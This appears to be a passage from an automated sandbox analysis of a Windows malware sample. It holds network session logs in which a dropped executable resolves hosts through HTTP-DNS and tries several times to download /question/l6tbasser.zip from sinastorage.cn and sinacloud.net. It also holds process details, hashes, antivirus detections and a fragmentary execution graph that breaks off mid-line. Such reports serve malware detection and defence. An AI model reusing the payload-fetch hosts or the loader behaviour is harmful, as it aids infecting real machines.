                                                                                 100 | 192.168.2.5 | 50082 | 114.114.114.114 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:25.015767097 CET | 83 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


Session ID: 101 | Source IP: 192.168.2.5 | Source Port: 50083 | Destination IP: 119.29.29.29 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:27:25.021914005 CET | 80 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
Dec 5, 2024 14:27:26.245949030 CET | 114 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


Session ID: 102 | Source IP: 192.168.2.5 | Source Port: 50084 | Destination IP: 182.254.116.116 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:27:25.101630926 CET | 83 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
Dec 5, 2024 14:27:26.661813974 CET | 114 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


Session ID: 103 | Source IP: 192.168.2.5 | Source Port: 50085 | Destination IP: 49.7.37.97 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:27:26.369856119 CET | 242 | OUT | GET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
Dec 5, 2024 14:27:27.945915937 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:27 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 345d03c2-2412-0521-2727-0894eff93894
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 35 64 30 33 63 32 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 32 37 2d 30 38 39 34 65 66 66 39 33 38 39 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>345d03c2-2412-0521-2727-0894eff93894</RequestId></Error>0


Session ID: 104 | Source IP: 192.168.2.5 | Source Port: 50086 | Destination IP: 27.221.16.149 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:27:29.231812000 CET | 241 | OUT | GET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
Dec 5, 2024 14:27:31.102735996 CET | 509 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:21 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 74127bac-2412-0521-2730-0894eff93275
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 31 32 37 62 61 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 33 30 2d 30 38 39 34 65 66 66 39 33 32 37 35 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>74127bac-2412-0521-2730-0894eff93275</RequestId></Error>0


Session ID: 105 | Source IP: 192.168.2.5 | Source Port: 50087 | Destination IP: 27.221.16.179 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:27:31.227541924 CET | 241 | OUT | GET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
Dec 5, 2024 14:27:32.978173018 CET | 509 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:30 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32cd48c3-2412-0521-2732-b4055d7528f1
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 63 64 34 38 63 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 33 32 2d 62 34 30 35 35 64 37 35 32 38 66 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>32cd48c3-2412-0521-2732-b4055d7528f1</RequestId></Error>0


Session ID: 106 | Source IP: 192.168.2.5 | Source Port: 50088 | Destination IP: 114.114.114.114 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:27:33.126008034 CET | 82 | OUT | GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


Session ID: 107 | Source IP: 192.168.2.5 | Source Port: 50089 | Destination IP: 182.254.116.116 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:27:33.130351067 CET | 82 | OUT | GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
Dec 5, 2024 14:27:35.257442951 CET | 131 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 37 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 34 39
                                                                                Data Ascii: 27.221.16.179;27.221.16.149


Session ID: 108 | Source IP: 192.168.2.5 | Source Port: 50090 | Destination IP: 119.29.29.29 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:27:33.133829117 CET | 79 | OUT | GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
Dec 5, 2024 14:27:34.363368988 CET | 131 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 34 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 37 39
                                                                                Data Ascii: 27.221.16.149;27.221.16.179


Session ID: 109 | Source IP: 192.168.2.5 | Source Port: 50091 | Destination IP: 27.221.16.149 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:27:34.489578009 CET | 241 | OUT | GET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive


Session ID: 110 | Source IP: 192.168.2.5 | Source Port: 50092 | Destination IP: 27.221.16.179 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:27:56.506449938 CET | 241 | OUT | GET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
Dec 5, 2024 14:27:58.260540009 CET | 509 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:55 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32da782c-2412-0521-2757-b4055d752cc6
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 64 61 37 38 32 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 35 37 2d 62 34 30 35 35 64 37 35 32 63 63 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>32da782c-2412-0521-2757-b4055d752cc6</RequestId></Error>0


Target ID: 0
Start time: 08:25:01
Start date: 05/12/2024
Path: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe"
Imagebase: 0xed0000
File size: 21'878'788 bytes
MD5 hash: 79E8C7FC08846104C300079E8F9CFFF2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 2
Start time: 08:25:04
Start date: 05/12/2024
Path: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\google\D74384FB8D2C9.exe" WfCSiyl7KCmSL4J0fXwpklp7KYEqfR6ShFd+QzmL6nTfLzmL6+rr5jmL5ejq5jx7JntO
Imagebase: 0x400000
File size: 1'168'440 bytes
MD5 hash: 0D79B45E55C20F14D9614596247B7DF2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 13%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 3
Start time: 08:25:07
Start date: 05/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff7e52b0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Execution Graph

Execution Coverage: 7.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 9.3%
Total number of Nodes: 2000
Total number of Limit Nodes: 157
                                                                                  execution_graph 86169 40d840 _memset _memset _sprintf 86170 40d8ba 86169->86170 86178 40d640 86170->86178 86179 40d662 86178->86179 86180 40d683 _strlen 86179->86180 86181 40d677 86179->86181 86180->86181 86237 404740 86181->86237 86183 40d6a8 86184 40d6b1 86183->86184 86185 40d6bd _strlen 86183->86185 86244 4068a0 86184->86244 86185->86184 86187 40d6e4 86252 406a10 86187->86252 86190 40d71c 86256 404700 86190->86256 86193 40d764 _strlen 86195 40d741 86193->86195 86195->86193 86196 404740 codecvt 7 API calls 86195->86196 86199 40d806 86195->86199 86200 40d7a9 _strlen 86195->86200 86204 4068a0 7 API calls 86195->86204 86260 40eee0 5 API calls codecvt 86195->86260 86196->86195 86201 404700 codecvt 4 API calls 86199->86201 86200->86195 86204->86195 86238 40475c codecvt 86237->86238 86243 40474f codecvt 86237->86243 86239 4047c7 86238->86239 86261 404930 86238->86261 86241 404805 _memcpy_s 86239->86241 86242 4047dd _memmove_s 86239->86242 86241->86243 86242->86243 86243->86183 86245 4068d1 codecvt 86244->86245 86246 406907 _strlen 86245->86246 86248 4068fe codecvt 86245->86248 86246->86248 86247 40699b _memcpy_s 86251 4069db codecvt 86247->86251 86248->86247 86249 404930 codecvt 5 API calls 86248->86249 86249->86247 86251->86187 86253 406a52 FindFirstFileA 86252->86253 86254 406a46 86252->86254 86253->86190 86253->86195 86255 404930 codecvt 5 API calls 86254->86255 86255->86253 86257 404726 86256->86257 86258 40473b 86256->86258 86260->86195 86262 40494f 86261->86262 86263 404977 codecvt 86262->86263 86265 404ab0 86262->86265 86263->86239 86266 404ade 86265->86266 86271 449e1f 86266->86271 86267 404af3 codecvt 86268 404b17 _memcpy_s 86267->86268 86269 404b59 86268->86269 86269->86263 86272 449e33 86271->86272 86273 449e2f 86271->86273 86275 46a7e7 86272->86275 86273->86267 86276 46a886 _malloc 86275->86276 86279 46a7f9 __FF_MSGBANNER _malloc 86275->86279 86276->86273 86278 46a856 
[Execution graph residue: the report's call-graph rendering was flattened by extraction into a list of internal node identifiers (86278->86279 and so on) that carries no readable structure. The recoverable content is the set of function addresses and the API calls reached from them. Nodes fall into three address ranges (0x40xxxx to 0x47xxxx, 0xbe9xxxx to 0xbeaxxxx, and 0x6a6dxxxx to 0x6a73xxxx). API calls named in the graph, grouped for readability:
Process enumeration and debugger check: CreateToolhelp32Snapshot, Process32First, Process32Next, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, ExitProcess
Service installation: OpenSCManagerA, CreateServiceA, OpenServiceA, StartServiceA, CloseServiceHandle
Networking: WSAStartup, WSACleanup, gethostbyname, inet_ntoa, inet_addr, htons, socket, ioctlsocket, connect, select, __WSAFDIsSet, send, recv, closesocket, WSAGetLastError
File I/O: CreateFileA, ReadFile, WriteFile, SetFilePointer, DeleteFileA, GetFileAttributesA, CloseHandle
Threads and synchronisation: CreateMutexA, CreateEventA, WaitForSingleObject, CreateThread, SetThreadPriority, Sleep, TlsAlloc, TlsGetValue, TlsSetValue, InitializeCriticalSection, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, InterlockedIncrement
Memory and runtime: HeapCreate, HeapAlloc, HeapFree, HeapDestroy, RtlAllocateHeap, RtlFreeHeap, VirtualFree, LocalAlloc, RaiseException, KiUserExceptionDispatcher, GetCommandLineA, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetLastError, SetLastError
Timing: GetSystemTimeAsFileTime, GetTickCount, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId
Other: CoGetClassObject, OutputDebugStringA, MultiByteToWideChar, SendMessageA, CreateWindowExA, NtdllDefWindowProc_A]
6a7000d8 67 API calls _vscan_fn 88226->88253 88229 6a6e4f1d 88229->88226 88234 6a6e5083 _memset moneypunct 88240 6a6e515b select 88234->88240 88234->88241 88242 6a6e5196 recv 88234->88242 88240->88234 88240->88241 88241->88219 88242->88241 88245->88017 88246->88223 88247->88229 88253->88234 88255->88049 88256 6a6e1f50 88257 6a6e1f77 88256->88257 88258 6a6dbf00 3 API calls 88257->88258 88259 6a6e1f7c 88258->88259 88260 6a6e1f8c 88259->88260 88261 6a6e1f80 88259->88261 88292 6a6e1d50 303 API calls 2 library calls 88260->88292 88291 6a6e1ba0 282 API calls 2 library calls 88261->88291 88264 6a6e1f9c 88274 6a6e1f85 88264->88274 88293 6a6e1d50 303 API calls 2 library calls 88264->88293 88267 6a6fd7eb ___ansicp 5 API calls 88269 6a6e20d1 88267->88269 88268 6a6e1fbb 88270 6a6e201e 88268->88270 88275 6a6e1fc4 _memset 88268->88275 88284 6a6e1b30 88270->88284 88273 6a6e2027 Sleep 88301 6a6e1d50 303 API calls 2 library calls 88273->88301 88274->88267 88294 6a6e1100 88275->88294 88280 6a6e2041 _memset 88280->88274 88282 6a6e1100 106 API calls 88280->88282 88283 6a6e208a DeleteFileA 88282->88283 88285 6a6e1b45 88284->88285 88286 6a6dbf00 3 API calls 88285->88286 88287 6a6e1b4a CreateFileA 88286->88287 88289 6a6e1b7d 88287->88289 88290 6a6e1b71 CloseHandle 88287->88290 88289->88273 88289->88274 88290->88289 88291->88274 88292->88264 88293->88268 88303 6a6dbaf0 88294->88303 88301->88280 88304 6a6dbb28 _memset 88303->88304 88317 6a6db9c0 WSAStartup 88304->88317 88306 6a6dbb37 _memset 88306->88306 88324 6a6df3b0 6 API calls ___ansicp 88306->88324 88308 6a6dbb74 88318 6a6dba42 88317->88318 88319 6a6dba2b gethostname 88317->88319 88322 6a6fd7eb ___ansicp 5 API calls 88318->88322 88319->88318 88320 6a6dba3c 88319->88320 88326 6a6fecba 102 API calls 2 library calls 88320->88326 88323 6a6dba95 88322->88323 88323->88306 88324->88308 88326->88318 88327 6a6e3850 88330 6a6e3874 _memset 88327->88330 88332 6a6e3928 88327->88332 88328 6a6fd7eb ___ansicp 5 API calls 88329 6a6e393e 88328->88329 
88337 6a6e6090 88330->88337 88332->88328 88338 6a6e4600 110 API calls 88337->88338 88339 6a6e60c6 88338->88339 88340 6a6e4600 110 API calls 88339->88340 88341 6a6e60d8 88340->88341 88342 6a6e4600 110 API calls 88341->88342 88343 6a6e60eb 88342->88343 88352 6a6de9c0 88343->88352 88346 6a6e4340 80 API calls 88347 6a6e6124 88346->88347 88355 6a6e5e60 88347->88355 88379 6a6de940 88352->88379 88380 6a6de94c 88379->88380 88381 6a6de956 88379->88381 88394 6a6dea00 80 API calls ctype 88380->88394 88395 6a6ff235 67 API calls __vscwprintf_helper 88381->88395 88384 6a6de963 88385 6a6de986 88384->88385 88387 6a6de890 ctype 80 API calls 88384->88387 88396 6a6ff03d 101 API calls __vsprintf_s_l 88385->88396 88387->88385 88388 6a6de994 88389 6a6de9a2 88388->88389 88397 6a6dea00 80 API calls ctype 88388->88397 88389->88346 88395->88384 88396->88388 88556 40b480 _memset _memset 88557 40b300 2 API calls 88556->88557 88558 40b4d9 _memset _strlen 88557->88558 88559 413a70 88558->88559 88560 40b51c _strlen 88559->88560 88561 40b5c1 _strlen 88560->88561 88562 40b536 88560->88562 88565 40b5a2 88561->88565 88563 40b57a _strlen 88562->88563 88566 46c1c6 8 API calls __strupr_s_l 88563->88566 88566->88565 88567 40f600 88570 409a40 88567->88570 88571 409a49 88570->88571 88572 408640 Sleep 88571->88572 88573 409a51 88572->88573 88574 409a66 88573->88574 88575 409a5a IWBE 88573->88575 88576 409a64 88574->88576 88577 409a6f SPEP 88574->88577 88575->88574 88575->88576 88577->88576 88578 40bc01 88579 40bc0c 88578->88579 88580 46a7e7 _malloc 4 API calls 88579->88580 88581 40bc1d 88580->88581 88582 410080 88583 410099 88582->88583 88584 4254e0 5 API calls 88583->88584 88585 410115 88584->88585 88588 426d70 88585->88588 88587 410191 88589 426d82 88588->88589 88590 445e71 7 API calls 88589->88590 88591 426dda 88590->88591 88594 453f1f 88591->88594 88593 426ded 88593->88587 88596 44488f 2 API calls 88594->88596 88595 453f3f 88595->88593 88596->88595 88597 411200 88598 411211 88597->88598 88609 449479 
88598->88609 88600 411221 88601 449479 ShowWindow 88600->88601 88602 411231 88601->88602 88603 449479 ShowWindow 88602->88603 88604 411241 88603->88604 88605 449479 ShowWindow 88604->88605 88606 411251 88605->88606 88607 449479 ShowWindow 88606->88607 88608 411261 88607->88608 88610 449494 88609->88610 88611 449484 ShowWindow 88609->88611 88611->88600 88612 41ea00 88613 41ea15 88612->88613 88615 41ea13 88612->88615 88616 41e210 88613->88616 88617 41e225 88616->88617 88663 424300 88617->88663 88620 424300 13 API calls 88621 41e532 SendMessageA 88620->88621 88622 41e5b4 88621->88622 88623 41e578 88621->88623 88625 424300 13 API calls 88622->88625 88624 424300 13 API calls 88623->88624 88626 41e5b2 88624->88626 88625->88626 88675 4216d0 88626->88675 88628 41e61c 88629 41e651 88628->88629 88630 41e6f2 88628->88630 88664 424338 88663->88664 88669 42436f codecvt 88663->88669 88665 424350 _strlen 88664->88665 88666 424347 88664->88666 88665->88666 88667 404740 codecvt 7 API calls 88666->88667 88667->88669 88668 445e71 7 API calls 88670 424389 88668->88670 88669->88668 88671 453f1f 2 API calls 88670->88671 88672 42439c 88671->88672 88673 4243a0 SendMessageA 88672->88673 88674 41e4f0 88672->88674 88673->88674 88674->88620 88676 421600 12 API calls 88675->88676 88677 4216f9 88676->88677 88677->88628 88693 411280 88694 411291 88693->88694 88695 449479 ShowWindow 88694->88695 88696 4112a1 88695->88696 88697 449479 ShowWindow 88696->88697 88698 4112b1 88697->88698 88699 449479 ShowWindow 88698->88699 88700 4112c1 88699->88700 88701 449479 ShowWindow 88700->88701 88702 4112d1 88701->88702 88703 410680 88704 41069a 88703->88704 88705 4254e0 5 API calls 88704->88705 88706 41071c 88705->88706 88707 42c880 SetWindowTextA 88708 42c8a0 task 88707->88708 88709 408889 88710 408827 RegSetValueExA 88709->88710 88711 408835 88710->88711 88712 45cf0c 88713 45cf17 88712->88713 88715 45cf2a 88713->88715 88716 44a5b1 KiUserExceptionDispatcher task 88713->88716 88717 be9baa4 88720 be9ba3c 
88717->88720 88726 be9511c 88720->88726 88723 be9ba61 FindClose 88724 be9ba95 88723->88724 88725 be9ba70 FileTimeToLocalFileTime FileTimeToDosDateTime 88723->88725 88725->88724 88727 be95120 FindFirstFileA 88726->88727 88727->88723 88727->88724 88728 6a6d6920 88731 6a6ef452 88728->88731 88732 6a6ef45c 88731->88732 88738 6a6ef7fa GetModuleFileNameA 88732->88738 88734 6a6d6925 88736 6a6ef473 InterlockedExchange 88736->88734 88739 6a6ef85c 88738->88739 88740 6a6ef82c 88738->88740 88743 6a6fd7eb ___ansicp 5 API calls 88739->88743 88740->88739 88741 6a6ef830 PathFindExtensionA 88740->88741 88746 6a6ef58b 88741->88746 88744 6a6ef466 88743->88744 88744->88734 88745 6a6ef30e 110 API calls ctype 88744->88745 88745->88736 88768 6a70183d 88746->88768 88748 6a6ef59a GetModuleHandleA GetProcAddress 88749 6a6ef688 GetModuleHandleA 88748->88749 88750 6a6ef5e3 ConvertDefaultLocale ConvertDefaultLocale GetProcAddress 88748->88750 88751 6a6ef6f8 GetModuleFileNameA 88749->88751 88752 6a6ef693 EnumResourceLanguagesA 88749->88752 88750->88751 88757 6a6ef64a ConvertDefaultLocale ConvertDefaultLocale 88750->88757 88754 6a6ef73b _memset 88751->88754 88767 6a6ef733 88751->88767 88752->88751 88753 6a6ef6b9 ConvertDefaultLocale ConvertDefaultLocale 88752->88753 88753->88751 88769 6a6eedf6 88754->88769 88757->88751 88763 6a6ef79f 88766 6a6ef7de 88763->88766 88780 6a6ef35b 88763->88780 88805 6a6ef42d DeactivateActCtx ReleaseActCtx 88766->88805 88804 6a7018c0 5 API calls ___ansicp 88767->88804 88768->88748 88770 6a6eeea8 88769->88770 88771 6a6eee18 GetModuleHandleA 88769->88771 88776 6a6eeead 88770->88776 88772 6a6eee30 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88771->88772 88774 6a6eee2b 88771->88774 88772->88774 88775 6a6eee9e 88774->88775 88806 6a6ee232 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 88774->88806 88775->88770 88777 6a6eeebe 88776->88777 88778 6a6eeec2 88776->88778 88777->88763 88778->88777 88779 6a6eeed1 CreateActCtxA 88778->88779 
88779->88777 88781 6a6ef39d GetLocaleInfoA 88780->88781 88782 6a6ef385 88780->88782 88783 6a6ef41d 88781->88783 88786 6a6ef392 ctype 88781->88786 88810 6a6fe796 67 API calls __cftof2_l 88782->88810 88805->88767 88806->88772 88810->88786 88846 40888e 88851 408897 88846->88851 88847 408945 RegEnumKeyExA 88848 4088b3 88847->88848 88847->88851 88849 4089b8 RegQueryValueExA 88849->88851 88851->88847 88851->88848 88851->88849 88852 408670 _memset 88851->88852 88853 6a6e28a0 88854 6a6e28db _memset 88853->88854 88855 6a6e2915 WSAStartup 88854->88855 88856 6a6e292c gethostname 88855->88856 88864 6a6e2988 _memset 88855->88864 88857 6a6e2944 88856->88857 88858 6a6e2982 WSACleanup 88856->88858 88893 6a6fecba 102 API calls 2 library calls 88857->88893 88858->88864 88860 6a6e299d 88862 6a6fd7eb ___ansicp 5 API calls 88860->88862 88861 6a6e2951 88894 6a6fecba 102 API calls 2 library calls 88861->88894 88863 6a6e29b0 88862->88863 88864->88860 88878 6a6e2730 88864->88878 88866 6a6e296e _realloc 88866->88858 88869 6a6e2a16 _memset _realloc 88870 6a6fde00 _sprintf 103 API calls 88869->88870 88871 6a6e2a79 88870->88871 88886 6a6e25d0 88871->88886 88879 6a6e276b _memset 88878->88879 88895 6a6e3640 88879->88895 88882 6a6e3640 103 API 